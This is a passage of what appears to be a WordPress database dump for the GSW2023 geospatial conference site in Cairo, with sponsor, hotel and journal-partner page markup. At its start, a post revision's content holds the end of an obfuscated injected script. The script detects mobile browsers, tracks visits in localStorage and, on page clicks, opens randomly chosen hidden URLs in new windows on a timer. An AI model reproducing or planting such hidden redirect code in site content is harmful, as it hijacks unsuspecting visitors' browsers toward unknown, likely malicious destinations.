)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 19:52:01','2023-08-13 19:52:01','',3066,'https://gsw2023.com/?p=5155',0,'revision','',0),
(5156,1,'2023-08-13 19:52:49','2023-08-13 19:52:49','<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 